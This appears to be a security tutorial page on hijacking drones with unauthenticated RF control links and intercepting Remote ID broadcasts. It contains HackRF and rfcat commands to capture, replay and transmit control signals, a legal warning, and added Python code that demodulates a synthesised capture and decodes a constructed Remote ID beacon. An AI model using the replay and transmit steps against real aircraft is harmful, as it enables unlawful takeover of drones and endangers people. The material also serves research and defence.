RF Hijacking
Exploitation
RF hijacking means capturing and replaying a drone's control-link transmissions, or injecting forged commands, to take over the UAV. It only works against links that do not authenticate the controller: many toy and low-cost hobby drones use a 2.4 GHz (or sub-1 GHz) link with no encryption or rolling code, whereas mainstream consumer platforms increasingly use frequency-hopping, encrypted links or WPA2-protected Wi-Fi, where a naive replay fails.
Capturing RC Signals
bash
# Use HackRF One to survey the 2.4 GHz band
# -f takes the range in MHz, -w the FFT bin width in Hz, -r writes the
# sweep as CSV, -1 stops after a single sweep
hackrf_sweep -f 2400:2500 -w 1000000 -1 -r spectrum.csv
# Record raw IQ on the channel where the control link showed up
# hackrf_transfer writes interleaved signed 8-bit I/Q (.cs8); -l/-g are RX gains
hackrf_transfer -r captured_signal.cs8 -f 2437000000 -s 8000000 -l 32 -g 40
# Analyze the IQ recording (not the sweep CSV) with inspectrum
inspectrum -r 8000000 captured_signal.cs8
# Alternative capture with GNU Radio Companion, flowgraph:
# osmocom Source (HackRF, 2.437 GHz, 8 Msps) → Low Pass Filter → File Sink
# Replay attack: retransmit the recording at the same centre frequency and
# sample rate; -x is TX VGA gain in dB (0-47)
# Caveat: most 2.4 GHz RC links hop across the band, so one 8 MHz capture
# holds only the dwells on that channel, and any link with a rolling code
# or an authenticated session ignores a replayed burst
hackrf_transfer -t captured_signal.cs8 -f 2437000000 -s 8000000 -x 40
# Alternative: YARD Stick One with rfcat for sub-1 GHz links
# (long-range RC on 433 MHz, 868 MHz, 915 MHz)
rfcat -r                        # research shell; the dongle is exposed as d
d.setFreq(433920000)
d.setMdmModulation(MOD_ASK_OOK)
d.setMdmDRate(4800)             # symbol rate must match the target link
# Sniff packets (Ctrl-C to stop)
d.RFlisten()
# Transmit a captured or crafted payload (bytes)
d.RFxmit(payload)
# Remote ID interception (FAA Part 89 requires it on US drones that must be registered)
# Broadcast Remote ID (ASTM F3411 / OpenDroneID) carries the UAS ID, position,
# altitude and operator location over Bluetooth LE advertisements, Wi-Fi
# Beacon vendor-specific elements (ASTM OUI FA:0B:BC) or Wi-Fi Aware (NAN)
# Capture beacons with airodump-ng on a monitor-mode interface
airodump-ng wlan0 --band abg
# airodump-ng does not decode the Remote ID payload; open the capture in
# Wireshark with the OpenDroneID Lua dissector shipped by opendroneid-core-c,
# which handles both the Beacon and the NAN transport
# DJI's proprietary "DroneID" (read by AeroScope) is a different protocol
# from FAA Remote ID, even though the name is often used for both

Illegal in Most Jurisdictions
Interfering with an aircraft is a crime in most jurisdictions, and drones are aircraft under US law. 18 U.S.C. § 32 covers damaging or interfering with aircraft, and 47 U.S.C. § 333 separately prohibits wilful interference with licensed radio communications, so jamming or spoofing a control link exposes you on both counts. Remote ID is designed to be received by anyone and passive spectrum surveys carry little risk; the exposure starts when you transmit. Test only in a Faraday enclosure or against your own aircraft with explicit written authorization.
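What the capture and replay steps above actually operate on, as an added example that is not part of the original page: a pure-Python envelope demodulator for an OOK/ASK burst stored in the interleaved signed 8-bit I/Q layout that hackrf_transfer -r records, run over a synthesised capture (assumed 2 Msps sample rate and 4800 baud, with a small carrier offset and Gaussian noise added). It also shows, with toy receiver classes written for this example, why a bit-exact replay is accepted by a fixed-code link and rejected as soon as the receiver checks a rolling counter, and why trailing zero bits cannot be recovered without knowing the frame length.

```python
"""Recover the bits of an OOK/ASK burst from an 8-bit interleaved I/Q
recording (the .cs8 layout hackrf_transfer -r writes) and show what a blind
replay does and does not reproduce.  Added example: the capture is
synthesised below, not taken from a real drone."""
import math
import random
import struct
from typing import List, Optional

SAMPLE_RATE = 2_000_000     # Hz, assumed capture rate (-s 2000000)
BAUD = 4800                 # assumed symbol rate of the RC link
SPS = SAMPLE_RATE / BAUD    # samples per symbol, 416.67 (not an integer)


def bits_from_bytes(data: bytes) -> List[int]:
    return [(b >> (7 - i)) & 1 for b in data for i in range(8)]


def bytes_from_bits(bits: List[int]) -> bytes:
    return bytes(int("".join(map(str, bits[i:i + 8])), 2)
                 for i in range(0, len(bits) - len(bits) % 8, 8))


def synth_ook_capture(payload: bytes, carrier_offset_hz: float = 150_000.0,
                      noise_sigma: float = 4.0, seed: int = 1) -> bytes:
    """Constructed capture: key `payload` on/off at BAUD, add a carrier offset
    (the SDR is never tuned exactly on the transmitter) and Gaussian noise,
    then serialise as interleaved signed 8-bit I,Q."""
    rng = random.Random(seed)
    bits = bits_from_bytes(payload)
    lead = int(SPS * 4)                      # silence before and after the burst
    total = lead + int(round(len(bits) * SPS)) + lead
    out = bytearray()
    for k in range(total):
        sym = math.floor((k - lead) / SPS)
        amp = 90.0 if 0 <= sym < len(bits) and bits[sym] else 0.0
        phase = 2 * math.pi * carrier_offset_hz * k / SAMPLE_RATE
        i = amp * math.cos(phase) + rng.gauss(0, noise_sigma)
        q = amp * math.sin(phase) + rng.gauss(0, noise_sigma)
        out += struct.pack("bb", int(max(-127, min(127, i))),
                           int(max(-127, min(127, q))))
    return bytes(out)


def demodulate_ook(capture: bytes, frame_bits: Optional[int] = None) -> List[int]:
    """Envelope detector: |I+jQ| is insensitive to the carrier offset, a
    threshold at half the peak slices the burst, and each symbol is sampled
    at its centre measured from the first rising edge.  Without a known
    frame length, trailing 0 bits are indistinguishable from silence."""
    iq = struct.unpack(f"{len(capture)}b", capture)
    env = [math.hypot(iq[2 * k], iq[2 * k + 1]) for k in range(len(iq) // 2)]
    if not env:
        return []
    thresh = max(env) / 2
    on = [k for k, e in enumerate(env) if e > thresh]
    if not on:
        return []
    start = on[0]
    nbits = frame_bits if frame_bits is not None else round((on[-1] + 1 - start) / SPS)
    bits = []
    for b in range(nbits):
        centre = start + int((b + 0.5) * SPS)
        bits.append(1 if centre < len(env) and env[centre] > thresh else 0)
    return bits


class FixedCodeReceiver:
    """Toy receiver for an unauthenticated link (hypothetical): any frame that
    matches the expected command bytes is accepted, so a replay works."""
    def __init__(self, command: bytes):
        self.command = command

    def accept(self, frame: bytes) -> bool:
        return frame == self.command


class RollingCodeReceiver:
    """Toy receiver (hypothetical) with a rolling counter in the first byte:
    a frame is accepted only if its counter is newer than the last one seen,
    so the same capture replayed a second time is rejected."""
    def __init__(self):
        self.last_counter = -1

    def accept(self, frame: bytes) -> bool:
        if not frame or frame[0] <= self.last_counter:
            return False
        self.last_counter = frame[0]
        return True


if __name__ == "__main__":
    cap = synth_ook_capture(b"\xa5\x0f\x33")
    frame = bytes_from_bits(demodulate_ook(cap))
    print("decoded:", frame.hex())
    rx = RollingCodeReceiver()
    print("first frame accepted:", rx.accept(frame), "replay accepted:", rx.accept(frame))
```

The replay step on the page is exactly `bytes(cap)` sent back out the radio: it reproduces the keyed burst bit for bit, which is why it succeeds against the fixed-code receiver and fails against the rolling one. For a real capture, replace the synthesised bytes with the contents of the .cs8 file and set SAMPLE_RATE and BAUD to the values used in the recording.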
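To make the Remote ID part concrete, an added example that is not from the original page: a decoder for Broadcast Remote ID messages carried in a Wi-Fi Beacon vendor-specific element, following the public ASTM F3411 / OpenDroneID byte layout (25-byte messages, message pack type 0xF, ASTM OUI FA:0B:BC, vendor type 0x0D). The beacon element it parses is constructed here with a made-up serial number and position, not a real capture; the same 25-byte messages appear in the Bluetooth LE and Wi-Fi NAN transports with different outer framing. Truncated or foreign elements raise rather than crash the sniffer.

```python
"""Decode Broadcast Remote ID (ASTM F3411 / OpenDroneID) messages from a
Wi-Fi Beacon vendor-specific element.  Added example: the field layout
follows the public OpenDroneID encoding; the element built below is
constructed test data, not a real capture."""
import struct
from typing import Dict, List

ASTM_OUI = bytes.fromhex("fa0bbc")   # ASTM International OUI used by Remote ID
RID_VENDOR_TYPE = 0x0D               # vendor-specific type for Beacon Remote ID
MSG_LEN = 25                         # every Remote ID message is 25 bytes
MSG_BASIC_ID, MSG_LOCATION, MSG_PACK = 0x0, 0x1, 0xF
ID_TYPES = {0: "none", 1: "serial", 2: "caa_registration", 3: "utm_uuid", 4: "session_id"}
STATUS = {0: "undeclared", 1: "ground", 2: "airborne", 3: "emergency", 4: "rid_failure"}


def parse_basic_id(m: bytes) -> Dict:
    # byte 1: ID type in the high nibble, UA type in the low nibble; bytes 2-21 UAS ID
    return {
        "type": "basic_id",
        "id_type": ID_TYPES.get(m[1] >> 4, "reserved"),
        "ua_type": m[1] & 0xF,
        "uas_id": m[2:22].rstrip(b"\0").decode("ascii", "replace"),
    }


def parse_location(m: bytes) -> Dict:
    (flags, direction, speed, vspeed, lat, lon, alt_baro, alt_geo, height,
     acc_hv, acc_bs, ts, ts_acc, _rsv) = struct.unpack("<BBBbiiHHHBBHBB", m[1:])
    speed_mult = flags & 1          # bit 0 selects the speed scale
    east_west = (flags >> 1) & 1    # bit 1 adds 180 degrees to the track
    return {
        "type": "location",
        "status": STATUS.get(flags >> 4, "reserved"),
        "height_type": "above_ground" if (flags >> 2) & 1 else "above_takeoff",
        "track_deg": direction + (180 if east_west else 0),
        "speed_mps": speed * 0.25 if speed_mult == 0 else speed * 0.75 + 255 * 0.25,
        "vspeed_mps": vspeed * 0.5,
        "lat": lat / 1e7,
        "lon": lon / 1e7,
        "alt_baro_m": alt_baro * 0.5 - 1000,   # altitudes/height: (x * 0.5) - 1000 m
        "alt_geo_m": alt_geo * 0.5 - 1000,
        "height_m": height * 0.5 - 1000,
        "horiz_acc": acc_hv & 0xF,
        "vert_acc": acc_hv >> 4,
        "time_s_into_hour": ts / 10,          # tenths of seconds since the hour
    }


def parse_message(m: bytes) -> Dict:
    if len(m) != MSG_LEN:
        raise ValueError("Remote ID message must be 25 bytes")
    mtype = m[0] >> 4
    if mtype == MSG_BASIC_ID:
        return parse_basic_id(m)
    if mtype == MSG_LOCATION:
        return parse_location(m)
    return {"type": "unknown", "msg_type": mtype, "version": m[0] & 0xF}


def parse_messages(buf: bytes) -> List[Dict]:
    """A Beacon usually carries a message pack (type 0xF): size, count, messages."""
    if not buf:
        raise ValueError("empty Remote ID payload")
    if buf[0] >> 4 != MSG_PACK:
        return [parse_message(buf[:MSG_LEN])]
    size, count = buf[1], buf[2]
    if size != MSG_LEN or len(buf) < 3 + size * count:
        raise ValueError("malformed or truncated message pack")
    return [parse_message(buf[3 + i * size:3 + (i + 1) * size]) for i in range(count)]


def parse_beacon_ie(ie: bytes) -> Dict:
    """Vendor-specific element: 0xDD, length, OUI, vendor type, counter, payload."""
    if len(ie) < 2 or ie[0] != 0xDD:
        raise ValueError("not a vendor-specific element")
    body = ie[2:2 + ie[1]]
    if len(body) != ie[1]:
        raise ValueError("truncated element")
    if body[:3] != ASTM_OUI or body[3] != RID_VENDOR_TYPE:
        raise ValueError("not a Remote ID element")
    return {"counter": body[4], "messages": parse_messages(body[5:])}


def build_sample_beacon_ie() -> bytes:
    """Constructed element with a Basic ID and a Location message (protocol v2)."""
    basic = bytes([MSG_BASIC_ID << 4 | 2, 1 << 4 | 2]) \
        + b"TEST-SERIAL-0001".ljust(20, b"\0") + b"\0\0\0"
    loc = bytes([MSG_LOCATION << 4 | 2]) + struct.pack(
        "<BBBbiiHHHBBHBB",
        2 << 4,                 # status airborne, above-takeoff, E/W 0, speed mult 0
        90, 20, 2,              # track 90 deg, 5 m/s, +1 m/s climb
        513200000, -1234000,    # 51.32 N, 0.1234 W (made up)
        2240, 2340, 2200,       # 120 m baro, 170 m geodetic, 100 m height
        0x4B, 0x32, 12345, 3, 0)
    pack = bytes([MSG_PACK << 4 | 2, MSG_LEN, 2]) + basic + loc
    body = ASTM_OUI + bytes([RID_VENDOR_TYPE, 7]) + pack
    return bytes([0xDD, len(body)]) + body


if __name__ == "__main__":
    for msg in parse_beacon_ie(build_sample_beacon_ie())["messages"]:
        print(msg)
```

In a live capture the element is the vendor-specific tag of each beacon frame; feed its raw bytes to `parse_beacon_ie` and watch the counter byte, which increments per transmission and makes duplicated or replayed beacons easy to spot.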